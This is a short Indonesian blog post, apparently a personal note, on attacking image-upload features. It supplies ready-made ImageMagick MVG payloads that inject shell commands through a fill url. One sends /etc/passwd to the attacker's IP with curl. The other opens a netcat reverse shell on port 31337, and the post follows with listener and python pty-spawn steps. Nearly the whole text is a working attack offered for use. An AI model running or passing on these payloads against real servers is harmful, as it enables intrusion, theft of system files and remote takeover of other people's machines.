Skip to main content

hack file upload pake jpg,png dan mvg

cek server

save ke file jpg,png atau gif


push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.0/oops.jpg"; cat /etc/passwd | curl -d @ http://(ip kamu):9700;touch "hello)'

pop graphic-context 




save ke file mvg


ush graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.0/oops.jpg"; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i

2>&1|nc (ip kamu) 31337 >/tmp/f;touch "hello)'

pop graphic-context


siapkan nc sudah dalam posisi listening

Agar lebih interaktif, shell bash perlu kamu spawn dengan perintah:  

python -c 'import pty; pty.spawn("/bin/bash")'.

terima kasih
sekedar untuk menyimpan data

Comments